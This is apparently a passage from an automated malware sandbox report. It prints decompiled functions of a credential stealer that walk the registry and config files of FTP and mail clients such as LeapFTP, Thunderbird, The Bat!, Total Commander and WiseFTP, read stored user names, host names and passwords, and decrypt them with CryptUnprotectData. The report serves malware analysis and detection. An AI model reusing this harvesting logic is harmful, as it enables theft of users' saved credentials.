                                                                    • RegCloseKey.ADVAPI32(?,?,?,00000000,?,?,?,?,?), ref: 0040E377
                                                                      • Part of subcall function 004043DC: CryptUnprotectData.CRYPT32(00000000,00000000,00000000,00000000,00000000,00000001,?), ref: 00404428
                                                                      • Part of subcall function 004043DC: LocalFree.KERNEL32(00000000), ref: 0040445C
                                                                      • Part of subcall function 004015CB: lstrlen.KERNEL32(00000000), ref: 004015D7
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.657769246.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.657765158.0000000000400000.00000002.00020000.sdmp
                                                                    • Associated: 00000000.00000002.657784188.0000000000413000.00000002.00020000.sdmp
                                                                    • Associated: 00000000.00000002.657791488.0000000000414000.00000004.00020000.sdmp
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CloseCryptDataFreeLocalOpenUnprotectlstrlen
                                                                    • String ID: Folder$Port$Site$UserID$xflags
                                                                    • API String ID: 2167297517-269738940
                                                                    • Opcode ID: 27a5410a2a34defe9eb4fbb078d41bd6a33cc389f29d2b866d8a81b3b4d7f2d5
                                                                    • Instruction ID: 29f1f953e1c0832a404ddd4bf1eb832a089b214c1547d71922d0550bed25c438
                                                                    • Opcode Fuzzy Hash: 27a5410a2a34defe9eb4fbb078d41bd6a33cc389f29d2b866d8a81b3b4d7f2d5
                                                                    • Instruction Fuzzy Hash: 7E31A73591010ABADF126F92CC02FEEBF76AF04344F10853AB920751F1D77A9A60EB48
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 100%
                                                                    			E004078C8(intOrPtr _a4, void* _a8, char* _a12) {
                                                                    				void* _v8;
                                                                    				int _v12;
                                                                    				int _v16;
                                                                    				char _v2064;
                                                                    				intOrPtr _v2068;
                                                                    				intOrPtr _v2072;
                                                                    				intOrPtr _v2076;
                                                                    				long _t39;
                                                                    				long _t40;
                                                                    				long _t43;
                                                                    
                                                                    				_t39 = RegOpenKeyA(_a8, _a12,  &_v8); // executed
                                                                    				_t40 = _t39;
                                                                    				if(_t40 == 0) {
                                                                    					_v12 = 0;
                                                                    					while(1) {
                                                                    						_v16 = 0x7ff;
                                                                    						_t43 = RegEnumKeyExA(_v8, _v12,  &_v2064,  &_v16, 0, 0, 0, 0);
                                                                    						_t44 = _t43;
                                                                    						if(_t43 != 0) {
                                                                    							break;
                                                                    						}
                                                                    						_v2068 = E00401DF8( &_v2064, E00401DF8(_t44, _a12, "\\"),  &_v2064);
                                                                    						E004018B8(_t45);
                                                                    						_v2072 = E00401D71(_a8, _v2068, "InstallPath", 0);
                                                                    						_v2076 = E00401D71(_a8, _v2068, "DataDir", 0);
                                                                    						if(_v2072 != 0) {
                                                                    							E00404351(_a4, _v2072, "sites.dat", 0xbeef0000);
                                                                    							E00404351(_a4, _v2072, "sites.ini", 0xbeef0001);
                                                                    						}
                                                                    						if(_v2076 != 0) {
                                                                    							E00404351(_a4, _v2076, "sites.dat", 0xbeef0000);
                                                                    							E00404351(_a4, _v2076, "sites.ini", 0xbeef0001);
                                                                    						}
                                                                    						E004018B8(_v2072);
                                                                    						E004018B8(_v2076);
                                                                    						E004078C8(_a4, _a8, _v2068);
                                                                    						E004018B8(_v2068);
                                                                    						_v12 = _v12 + 1;
                                                                    					}
                                                                    					return RegCloseKey(_v8);
                                                                    				}
                                                                    				return _t40;
                                                                    			}

                                                                    APIs
                                                                    • RegOpenKeyA.ADVAPI32(?,?,?), ref: 004078DB
                                                                    • RegEnumKeyExA.ADVAPI32 ref: 0040790F
                                                                    • RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 00407A2A
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.657769246.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.657765158.0000000000400000.00000002.00020000.sdmp
                                                                    • Associated: 00000000.00000002.657784188.0000000000413000.00000002.00020000.sdmp
                                                                    • Associated: 00000000.00000002.657791488.0000000000414000.00000004.00020000.sdmp
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CloseEnumOpen
                                                                    • String ID: DataDir$InstallPath$sites.dat$sites.ini
                                                                    • API String ID: 1332880857-3870687875
                                                                    • Opcode ID: 362131b18f64d95850ad3324091aff6a7822ff3789688bb0b819df8fcd119598
                                                                    • Instruction ID: e7b8c0c935d4d0c454aa1f99ca68a1ed178d52b45ef830c738b4bbc260966493
                                                                    • Opcode Fuzzy Hash: 362131b18f64d95850ad3324091aff6a7822ff3789688bb0b819df8fcd119598
                                                                    • Instruction Fuzzy Hash: 4531F43194011CFADF216B51CC42FDD7ABABF40304F14C0BABA54740A1CBB96B91AF99
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 100%
                                                                    			E0040F81F(void* __ebx, void* __ecx, void* __edi, void* __eflags, intOrPtr _a4) {
                                                                    				intOrPtr _v8;
                                                                    				char _v269;
                                                                    				void* _t28;
                                                                    				void* _t30;
                                                                    
                                                                    				_t30 = __eflags;
                                                                    				_t28 = __ecx;
                                                                    				_v8 = E004015F0(_a4, 0x5f, 0);
                                                                    				 *0x416030 = 2;
                                                                    				GetCurrentDirectoryA(0x104,  &_v269);
                                                                    				E00409C3C(_t28, _a4,  *0x414869, "Software\\Mozilla", "Thunderbird", "\\Thunderbird"); // executed
                                                                    				E00409C3C(_t28, _a4, 0x80000002, "Software\\Mozilla", "Thunderbird", "\\Thunderbird"); // executed
                                                                    				SetCurrentDirectoryA( &_v269);
                                                                    				 *0x416030 = 3;
                                                                    				GetCurrentDirectoryA(0x104,  &_v269);
                                                                    				E00409C3C(_t28, _a4,  *0x414869, "Software\\Mozilla", "Thunderbird", "\\Thunderbird");
                                                                    				E00409C3C(_t28, _a4, 0x80000002, "Software\\Mozilla", "Thunderbird", "\\Thunderbird");
                                                                    				SetCurrentDirectoryA( &_v269);
                                                                    				return E00401636(__ebx, _t28, __edi, _t30, _a4, _v8);
                                                                    			}

                                                                    APIs
                                                                    • GetCurrentDirectoryA.KERNEL32(00000104,?), ref: 0040F84D
                                                                      • Part of subcall function 00409C3C: StrStrIA.SHLWAPI(?,?), ref: 00409C48
                                                                      • Part of subcall function 00409C3C: RegOpenKeyA.ADVAPI32(?,?,?), ref: 00409CBF
                                                                      • Part of subcall function 00409C3C: RegEnumKeyExA.ADVAPI32 ref: 00409CEB
                                                                      • Part of subcall function 00409C3C: RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?,00000800,?,?), ref: 00409D33
                                                                    • SetCurrentDirectoryA.KERNEL32(?,?), ref: 0040F892
                                                                    • GetCurrentDirectoryA.KERNEL32(00000104,?,?,?), ref: 0040F8AD
                                                                    • SetCurrentDirectoryA.KERNEL32(?,?,?,?), ref: 0040F8F2
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.657769246.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.657765158.0000000000400000.00000002.00020000.sdmp
                                                                    • Associated: 00000000.00000002.657784188.0000000000413000.00000002.00020000.sdmp
                                                                    • Associated: 00000000.00000002.657791488.0000000000414000.00000004.00020000.sdmp
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CurrentDirectory$CloseEnumOpen
                                                                    • String ID: Software\Mozilla$Thunderbird$\Thunderbird
                                                                    • API String ID: 3062143572-138716004
                                                                    • Opcode ID: f06d37bfe171a568b370491e0634d08446b017f874cf0aa5a1507adbf09138d6
                                                                    • Instruction ID: 97e5a13185e0f9c508a72f46a089416fd48b8e24879e356ae91fef65a2890253
                                                                    • Opcode Fuzzy Hash: f06d37bfe171a568b370491e0634d08446b017f874cf0aa5a1507adbf09138d6
                                                                    • Instruction Fuzzy Hash: 60111F30788208BADF11BB61CC43FCD7A75AB10748F508466B648751E3DBF99AD49B48
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 76%
                                                                    			E00407A7F(void* __ebx, void* __ecx, intOrPtr _a4) {
                                                                    				intOrPtr _v8;
                                                                    				void* __edi;
                                                                    				char* _t22;
                                                                    				void* _t26;
                                                                    				void* _t28;
                                                                    				char* _t31;
                                                                    				void* _t33;
                                                                    				void* _t35;
                                                                    				void* _t38;
                                                                    				void* _t39;
                                                                    				void* _t40;
                                                                    				char* _t41;
                                                                    				char* _t42;
                                                                    
                                                                    				_t39 = __ecx;
                                                                    				_t38 = __ebx;
                                                                    				_v8 = E004015F0(_a4, 0x1b, 0);
                                                                    				_t42 =  *0x4147ed; // 0x640b38
                                                                    				_t41 =  *0x4147f1; // 0x645e80
                                                                    				if( *_t41 == 0) {
                                                                    					L10:
                                                                    					E00407A33(_t47, _a4, 0x1a); // executed
                                                                    					E00407A33(_t47, _a4, 0x23); // executed
                                                                    					E00407A33(_t47, _a4, 0x1c); // executed
                                                                    					E004078C8(_a4,  *0x414869, "SOFTWARE\\LeapWare"); // executed
                                                                    					E004078C8(_a4, 0x80000002, "SOFTWARE\\LeapWare"); // executed
                                                                    					return E00401636(_t38, _t39, _t41, _t47, _a4, _v8);
                                                                    				} else {
                                                                    					goto L1;
                                                                    				}
                                                                    				do {
                                                                    					L1:
                                                                    					_t22 = StrStrA(_t42, "unleap.exe");
                                                                    					if(_t22 == 0) {
                                                                    						__eflags = StrStrIA(_t41, "leapftp");
                                                                    						if(__eflags != 0) {
                                                                    							_t26 = E0040242B(__eflags, _t42);
                                                                    							_push(_t26);
                                                                    							E00404351(_a4, _t26, "sites.dat", 0xbeef0000);
                                                                    							_t28 = _t26;
                                                                    							E00404351(_a4, _t28, "sites.ini", 0xbeef0001);
                                                                    							E004018B8();
                                                                    						}
                                                                    					} else {
                                                                    						_t31 = _t22 + 1;
                                                                    						_t45 =  *_t31;
                                                                    						if( *_t31 != 0) {
                                                                    							_push(_t31);
                                                                    							_push("unleap.exe");
                                                                    							L0041066A();
                                                                    							_pop(_t40);
                                                                    							_t33 = E0040242B(_t45, _t31 + _t40);
                                                                    							_push(_t33);
                                                                    							E00404351(_a4, _t33, "sites.dat", 0xbeef0000);
                                                                    							_t35 = _t33;
                                                                    							E00404351(_a4, _t35, "sites.ini", 0xbeef0001);
                                                                    							E004018B8();
                                                                    						}
                                                                    					}
                                                                    					while( *_t42 != 0) {
                                                                    						_t42 =  &(_t42[1]);
                                                                    						__eflags = _t42;
                                                                    					}
                                                                    					_t42 =  &(_t42[1]);
                                                                    					asm("cld");
                                                                    					_t39 = 0xffffffff;
                                                                    					asm("repne scasb");
                                                                    					_t47 =  *_t41;
                                                                    				} while ( *_t41 != 0);
                                                                    				goto L10;
                                                                    			}

                                                                    APIs
                                                                    • StrStrA.SHLWAPI(00640B38,unleap.exe), ref: 00407AB1
                                                                    • lstrlen.KERNEL32(unleap.exe,00000001,00640B38,unleap.exe), ref: 00407ACA
                                                                      • Part of subcall function 0040242B: lstrlen.KERNEL32(?), ref: 0040243F
                                                                      • Part of subcall function 0040242B: StrStrIA.SHLWAPI(00000000,.exe,?), ref: 0040245E
                                                                      • Part of subcall function 0040242B: StrRChrIA.SHLWAPI(00000000,00000000,0000005C,00000000,.exe,?), ref: 00402470
                                                                      • Part of subcall function 0040242B: lstrlen.KERNEL32(00000000,00000000,00000000,0000005C,00000000,.exe,?), ref: 00402482
                                                                      • Part of subcall function 004018B8: LocalFree.KERNEL32(00000000,?,004024D2,?,?,?,?,?,?), ref: 004018C4
                                                                    • StrStrIA.SHLWAPI(00645E80,leapftp,00640B38,unleap.exe), ref: 00407B0E
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.657769246.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.657765158.0000000000400000.00000002.00020000.sdmp
                                                                    • Associated: 00000000.00000002.657784188.0000000000413000.00000002.00020000.sdmp
                                                                    • Associated: 00000000.00000002.657791488.0000000000414000.00000004.00020000.sdmp
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: lstrlen$FreeLocal
                                                                    • String ID: SOFTWARE\LeapWare$leapftp$sites.dat$sites.ini$unleap.exe
                                                                    • API String ID: 1884169789-1497043051
                                                                    • Opcode ID: 5300ff160b27690eb6490a884dddbaa25e25ba5e465f0f872f45c6ffda6eae1a
                                                                    • Instruction ID: 386b857961e923e72b6bd9048734cec28c80f28d71c9641b52c3ac27aeea778a
                                                                    • Opcode Fuzzy Hash: 5300ff160b27690eb6490a884dddbaa25e25ba5e465f0f872f45c6ffda6eae1a
                                                                    • Instruction Fuzzy Hash: 0C217571A48104BDEF113B22CC02FEE7E1ADB81748F244437B905B51E2C7BDAB91969D
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 100%
                                                                    			E0040EF6C(intOrPtr _a4, intOrPtr _a8) {
                                                                    				intOrPtr _v8;
                                                                    				intOrPtr* _v12;
                                                                    				char _v16;
                                                                    				intOrPtr _v20;
                                                                    				char _v60;
                                                                    				char _v64;
                                                                    				intOrPtr _t36;
                                                                    				intOrPtr _t37;
                                                                    				intOrPtr _t38;
                                                                    				intOrPtr _t39;
                                                                    				intOrPtr _t40;
                                                                    				intOrPtr _t41;
                                                                    				intOrPtr* _t43;
                                                                    				intOrPtr* _t44;
                                                                    				intOrPtr _t47;
                                                                    				intOrPtr _t53;
                                                                    				void* _t62;
                                                                    
                                                                    				_t36 = E00401D71(_a8, "Software\\RIT\\The Bat!", "Working Directory", 0); // executed
                                                                    				_t37 = _t36;
                                                                    				if(_t37 != 0) {
                                                                    					_v8 = _t37;
                                                                    					E0040EEF7(_a4, _v8);
                                                                    					E004018B8(_v8);
                                                                    				}
                                                                    				_t38 = E00401D71(_a8, "Software\\RIT\\The Bat!", "ProgramDir", 0); // executed
                                                                    				_t39 = _t38;
                                                                    				if(_t39 != 0) {
                                                                    					_v8 = _t39;
                                                                    					E0040EEF7(_a4, _v8);
                                                                    					E004018B8(_v8);
                                                                    				}
                                                                    				_t40 = E00401D71(_a8, "Software\\RIT\\The Bat!\\Users depot", "Default", 0); // executed
                                                                    				_t41 = _t40;
                                                                    				if(_t41 != 0) {
                                                                    					_v8 = _t41;
                                                                    					E0040EEF7(_a4, _v8);
                                                                    					E004018B8(_v8);
                                                                    				}
                                                                    				_t43 = E00401D71(_a8, "Software\\RIT\\The Bat!\\Users depot", "Count",  &_v16); // executed
                                                                    				_t44 = _t43;
                                                                    				if(_t44 != 0) {
                                                                    					_v12 = _t44;
                                                                    					if(_v16 != 4) {
                                                                    						L17:
                                                                    						return E004018B8(_v12);
                                                                    					}
                                                                    					_t47 =  *_v12;
                                                                    					if(_t47 > 0x2710) {
                                                                    						_t47 = 0x2710;
                                                                    					}
                                                                    					_v20 = _t47;
                                                                    					while(_v20 != 0) {
                                                                    						wsprintfA( &_v60, "Dir #%d", _v20);
                                                                    						_t62 = _t62 + 0xc;
                                                                    						_t53 = E00401D71(_a8, "Software\\RIT\\The Bat!\\Users depot",  &_v60,  &_v64);
                                                                    						if(_t53 != 0) {
                                                                    							_v8 = _t53;
                                                                    							if(_v64 > 3) {
                                                                    								E0040EEF7(_a4, _v8);
                                                                    							}
                                                                    							E004018B8(_v8);
                                                                    						}
                                                                    						_v20 = _v20 - 1;
                                                                    					}
                                                                    					goto L17;
                                                                    				}
                                                                    				return _t44;
                                                                    			}

                                                                    APIs
                                                                      • Part of subcall function 004018B8: LocalFree.KERNEL32(00000000,?,004024D2,?,?,?,?,?,?), ref: 004018C4
                                                                    • wsprintfA.USER32 ref: 0040F041
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.657769246.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.657765158.0000000000400000.00000002.00020000.sdmp
                                                                    • Associated: 00000000.00000002.657784188.0000000000413000.00000002.00020000.sdmp
                                                                    • Associated: 00000000.00000002.657791488.0000000000414000.00000004.00020000.sdmp
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: FreeLocalwsprintf
                                                                    • String ID: Count$Default$Dir #%d$ProgramDir$Software\RIT\The Bat!$Software\RIT\The Bat!\Users depot$Working Directory
                                                                    • API String ID: 988369812-1921698578
                                                                    • Opcode ID: c69ef0954902c4713d423042458d5ad8077758b8e240eb6b0a7ef15e578b7c8b
                                                                    • Instruction ID: cd3023906f6ae057e5bdde1cd0ba176c3d04abf87e76bd78a7c681664f89a6ca
                                                                    • Opcode Fuzzy Hash: c69ef0954902c4713d423042458d5ad8077758b8e240eb6b0a7ef15e578b7c8b
                                                                    • Instruction Fuzzy Hash: 50313A34E40209FADF11AFA1DC42EEE7A75AF00304F6085B7F410B51E1DB798BA5AB48
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 100%
                                                                    			E00404C51(void* __ebx, void* __ecx, void* __edi, void* __eflags, intOrPtr _a4) {
                                                                    				intOrPtr _v8;
                                                                    				CHAR* _v12;
                                                                    				intOrPtr _v16;
                                                                    				int _t37;
                                                                    				void* _t39;
                                                                    				void* _t41;
                                                                    				void* _t42;
                                                                    				void* _t43;
                                                                    				void* _t44;
                                                                    				void* _t45;
                                                                    				void* _t47;
                                                                    				intOrPtr _t50;
                                                                    				void* _t51;
                                                                    				intOrPtr _t54;
                                                                    				void* _t55;
                                                                    				intOrPtr _t57;
                                                                    				intOrPtr _t58;
                                                                    				void* _t59;
                                                                    				intOrPtr _t61;
                                                                    				intOrPtr _t62;
                                                                    				void* _t79;
                                                                    				void* _t80;
                                                                    				void* _t81;
                                                                    
                                                                    				_t81 = __edi;
                                                                    				_t80 = __ecx;
                                                                    				_t79 = __ebx;
                                                                    				_v8 = E004015F0(_a4, 2, 0);
                                                                    				_v12 = E004018CF(0x105);
                                                                    				_t37 = GetWindowsDirectoryA(_v12, 0x104);
                                                                    				if(_t37 == 0) {
                                                                    					L3:
                                                                    					E004018B8(_v12);
                                                                    				} else {
                                                                    					_t84 = _t37 - 0x104;
                                                                    					if(_t37 > 0x104) {
                                                                    						goto L3;
                                                                    					} else {
                                                                    						E00404B1E(_a4, _v12); // executed
                                                                    					}
                                                                    				}
                                                                    				_t39 = E00401EB1(_t84, 0x28); // executed
                                                                    				E00404B1E(_a4, _t39); // executed
                                                                    				_t41 = E00401EB1(_t84, 0x1a); // executed
                                                                    				_t42 = _t41;
                                                                    				_t85 = _t42;
                                                                    				if(_t42 != 0) {
                                                                    					E00404B1E(_a4, E00401E4C(_t42, _t42, "\\GHISLER")); // executed
                                                                    				}
                                                                    				_t43 = E00401EB1(_t85, 0x23); // executed
                                                                    				_t44 = _t43;
                                                                    				_t86 = _t44;
                                                                    				if(_t44 != 0) {
                                                                    					E00404B1E(_a4, E00401E4C(_t44, _t44, "\\GHISLER")); // executed
                                                                    				}
                                                                    				_t45 = E00401EB1(_t86, 0x1c); // executed
                                                                    				_t46 = _t45;
                                                                    				if(_t45 != 0) {
                                                                    					E00404B1E(_a4, E00401E4C(_t46, _t46, "\\GHISLER")); // executed
                                                                    				}
                                                                    				_t47 = E00401D71( *0x414869, "Software\\Ghisler\\Windows Commander", "InstallDir", 0); // executed
                                                                    				E00404B1E(_a4, _t47);
                                                                    				_t50 = E00401D71( *0x414869, "Software\\Ghisler\\Windows Commander", "FtpIniName", 0);
                                                                    				if(_t50 != 0) {
                                                                    					_v16 = _t50;
                                                                    					E00404B07(_a4, _v16);
                                                                    					E004018B8(_v16);
                                                                    				}
                                                                    				_t51 = E00401D71( *0x414869, "Software\\Ghisler\\Total Commander", "InstallDir", 0); // executed
                                                                    				E00404B1E(_a4, _t51);
                                                                    				_t54 = E00401D71( *0x414869, "Software\\Ghisler\\Total Commander", "FtpIniName", 0);
                                                                    				if(_t54 != 0) {
                                                                    					_v16 = _t54;
                                                                    					E00404B07(_a4, _v16);
                                                                    					E004018B8(_v16);
                                                                    				}
                                                                    				_t55 = E00401D71(0x80000002, "Software\\Ghisler\\Windows Commander", "InstallDir", 0); // executed
                                                                    				E00404B1E(_a4, _t55);
                                                                    				_t57 = E00401D71(0x80000002, "Software\\Ghisler\\Windows Commander", "FtpIniName", 0); // executed
                                                                    				_t58 = _t57;
                                                                    				if(_t58 != 0) {
                                                                    					_v16 = _t58;
                                                                    					E00404B07(_a4, _v16);
                                                                    					E004018B8(_v16);
                                                                    				}
                                                                    				_t59 = E00401D71(0x80000002, "Software\\Ghisler\\Total Commander", "InstallDir", 0); // executed
                                                                    				E00404B1E(_a4, _t59);
                                                                    				_t61 = E00401D71(0x80000002, "Software\\Ghisler\\Total Commander", "FtpIniName", 0); // executed
                                                                    				_t62 = _t61;
                                                                    				_t91 = _t62;
                                                                    				if(_t62 != 0) {
                                                                    					_v16 = _t62;
                                                                    					E00404B07(_a4, _v16);
                                                                    					E004018B8(_v16);
                                                                    				}
                                                                    				return E00401636(_t79, _t80, _t81, _t91, _a4, _v8);
                                                                    			}

                                                                    APIs
                                                                      • Part of subcall function 004018CF: LocalAlloc.KERNEL32(00000040,0040242B,?,004024AB,?), ref: 004018DD
                                                                    • GetWindowsDirectoryA.KERNEL32(?,00000104,00000105), ref: 00404C7B
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.657769246.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.657765158.0000000000400000.00000002.00020000.sdmp
                                                                    • Associated: 00000000.00000002.657784188.0000000000413000.00000002.00020000.sdmp
                                                                    • Associated: 00000000.00000002.657791488.0000000000414000.00000004.00020000.sdmp
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: AllocDirectoryLocalWindows
                                                                    • String ID: FtpIniName$InstallDir$Software\Ghisler\Total Commander$Software\Ghisler\Windows Commander$\GHISLER
                                                                    • API String ID: 3186838798-3636168975
                                                                    • Opcode ID: d9f4a13bbe22218abea59ec36b5e0dd8197697bfcb02beac9bb27fde15afba29
                                                                    • Instruction ID: 43e3b734b20d4af43a7562869c4868c7ee74a92454cd73f3ffe9b37604960ea0
                                                                    • Opcode Fuzzy Hash: d9f4a13bbe22218abea59ec36b5e0dd8197697bfcb02beac9bb27fde15afba29
                                                                    • Instruction Fuzzy Hash: E841EEB4A80608BAEF123B62CC43FDD7A66DF80744F60857B7A10750F2DABD99509A5C
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 100%
                                                                    			E0040491B(intOrPtr _a4, char* _a8) {
                                                                    				void* _v8;
                                                                    				int _v12;
                                                                    				int _v16;
                                                                    				char _v2064;
                                                                    				intOrPtr _v2068;
                                                                    				intOrPtr _v2072;
                                                                    				intOrPtr _v2076;
                                                                    				intOrPtr _v2080;
                                                                    				long _t38;
                                                                    				long _t39;
                                                                    				long _t42;
                                                                    
                                                                    				_t38 = RegOpenKeyA( *0x414869, _a8,  &_v8); // executed
                                                                    				_t39 = _t38;
                                                                    				if(_t39 == 0) {
                                                                    					_v12 = 0;
                                                                    					while(1) {
                                                                    						_v16 = 0x7ff;
                                                                    						_t42 = RegEnumKeyExA(_v8, _v12,  &_v2064,  &_v16, 0, 0, 0, 0);
                                                                    						_t43 = _t42;
                                                                    						if(_t42 != 0) {
                                                                    							break;
                                                                    						}
                                                                    						_v2068 = E00401DF8( &_v2064, E00401DF8(_t43, _a8, "\\"),  &_v2064);
                                                                    						E004018B8(_t44);
                                                                    						_v2080 = E00401D71( *0x414869, _v2068, "Password", 0);
                                                                    						_v2072 = E00401D71( *0x414869, _v2068, "HostName", 0);
                                                                    						_v2076 = E00401D71( *0x414869, _v2068, "User", 0);
                                                                    						if(_v2080 != 0 && _v2072 != 0 && _v2076 != 0) {
                                                                    							E004015CB(E004015CB(E004015CB(E00401569(_a4, 0xbeef0000), _a4, _v2072), _a4, _v2076), _a4, _v2080);
                                                                    						}
                                                                    						E004018B8(_v2080);
                                                                    						E004018B8(_v2072);
                                                                    						E004018B8(_v2076);
                                                                    						E0040491B(_a4, _v2068);
                                                                    						E004018B8(_v2068);
                                                                    						_v12 = _v12 + 1;
                                                                    					}
                                                                    					return RegCloseKey(_v8);
                                                                    				}
                                                                    				return _t39;
                                                                    			}

                                                                    APIs
                                                                    • RegOpenKeyA.ADVAPI32(?,?), ref: 00404931
                                                                    • RegEnumKeyExA.ADVAPI32 ref: 00404965
                                                                    • RegCloseKey.ADVAPI32(?,?,00000000,?,?,00000000,00000000,00000000,00000000,?,?), ref: 00404A8C
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.657769246.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.657765158.0000000000400000.00000002.00020000.sdmp
                                                                    • Associated: 00000000.00000002.657784188.0000000000413000.00000002.00020000.sdmp
                                                                    • Associated: 00000000.00000002.657791488.0000000000414000.00000004.00020000.sdmp
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CloseEnumOpen
                                                                    • String ID: HostName$Password$User
                                                                    • API String ID: 1332880857-1253078594
                                                                    • Opcode ID: d50ab80f77cd9ee8984736a31060d6c067cbe76ee4c381ea4d49959f18991d6e
                                                                    • Instruction ID: 70a3f47a41d3c5b7bb25802f3bcf3ab2eab4f79ca17ead1258ab74d3b4d68c93
                                                                    • Opcode Fuzzy Hash: d50ab80f77cd9ee8984736a31060d6c067cbe76ee4c381ea4d49959f18991d6e
                                                                    • Instruction Fuzzy Hash: B131F37594011CBADF22AB61CC02BDD7ABABF84304F10C4BAB544750F1DB795B92AF88
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 93%
                                                                    			E00408E0D(void* __ecx, intOrPtr _a4, void* _a8, char* _a12) {
                                                                    				void* _v8;
                                                                    				int _v12;
                                                                    				int _v16;
                                                                    				char _v2064;
                                                                    				intOrPtr _v2068;
                                                                    				intOrPtr _v2072;
                                                                    				intOrPtr _v2076;
                                                                    				long _t34;
                                                                    				long _t35;
                                                                    				long _t38;
                                                                    				intOrPtr _t46;
                                                                    				intOrPtr _t50;
                                                                    				void* _t57;
                                                                    
                                                                    				_t57 = __ecx;
                                                                    				_t34 = RegOpenKeyA(_a8, _a12,  &_v8); // executed
                                                                    				_t35 = _t34;
                                                                    				if(_t35 == 0) {
                                                                    					_v12 = 0;
                                                                    					while(1) {
                                                                    						_v16 = 0x7ff;
                                                                    						_t38 = RegEnumKeyExA(_v8, _v12,  &_v2064,  &_v16, 0, 0, 0, 0);
                                                                    						_t39 = _t38;
                                                                    						if(_t38 != 0) {
                                                                    							break;
                                                                    						}
                                                                    						_v2068 = E00401DF8( &_v2064, E00401DF8(_t39, _a12, "\\"),  &_v2064);
                                                                    						E004018B8(_t40);
                                                                    						_v2072 = E00401D71(_a8, _v2068, 0, 0);
                                                                    						_t46 = E0040242B(__eflags, _v2072);
                                                                    						__eflags = _t46;
                                                                    						if(_t46 == 0) {
                                                                    							L8:
                                                                    							E004018B8(_v2072);
                                                                    							E00408E0D(_t57, _a4, _a8, _v2068);
                                                                    							E004018B8(_v2068);
                                                                    							_v12 = _v12 + 1;
                                                                    							continue;
                                                                    						}
                                                                    						_push(_t46);
                                                                    						_v2076 = _t46;
                                                                    						_t50 = E00401F7E(_v2076);
                                                                    						__eflags = _t50;
                                                                    						if(_t50 != 0) {
                                                                    							E00404351(_a4, _v2076, "wiseftpsrvs.ini", 0xbeef0002);
                                                                    							E00404351(_a4, _v2076, "wiseftp.ini", 0xbeef0002);
                                                                    							E00404351(_a4, _v2076, "wiseftpsrvs.bin", 0xbeef0000);
                                                                    						}
                                                                    						E004018B8();
                                                                    						goto L8;
                                                                    					}
                                                                    					return RegCloseKey(_v8);
                                                                    				}
                                                                    				return _t35;
                                                                    			}

                                                                    APIs
                                                                    • RegOpenKeyA.ADVAPI32(?,?,?), ref: 00408E20
                                                                    • RegEnumKeyExA.ADVAPI32 ref: 00408E54
                                                                    • RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 00408F46
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.657769246.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.657765158.0000000000400000.00000002.00020000.sdmp
                                                                    • Associated: 00000000.00000002.657784188.0000000000413000.00000002.00020000.sdmp
                                                                    • Associated: 00000000.00000002.657791488.0000000000414000.00000004.00020000.sdmp
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CloseEnumOpen
                                                                    • String ID: wiseftp.ini$wiseftpsrvs.bin$wiseftpsrvs.ini
                                                                    • API String ID: 1332880857-3184955129
                                                                    • Opcode ID: 26a2837719ac650df69141e5573d33545b2da118860850cdd9de88edb11d1a45
                                                                    • Instruction ID: 379df70dab51ed1233c69cde4acd9fbee75a0c7acd1daed002fcfe2591656a96
                                                                    • Opcode Fuzzy Hash: 26a2837719ac650df69141e5573d33545b2da118860850cdd9de88edb11d1a45
                                                                    • Instruction Fuzzy Hash: 9031E33190010DBADF21AB61CD42FDD7ABABF40304F1084BAB654B41E1DE799B91AF98
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 60%
                                                                    			E0040A875(intOrPtr _a4) {
                                                                    				void* _v8;
                                                                    				void* _v12;
                                                                    				short _v44;
                                                                    				WCHAR* _v48;
                                                                    				char _v52;
                                                                    				char _v56;
                                                                    				short _v60;
                                                                    				char* _t34;
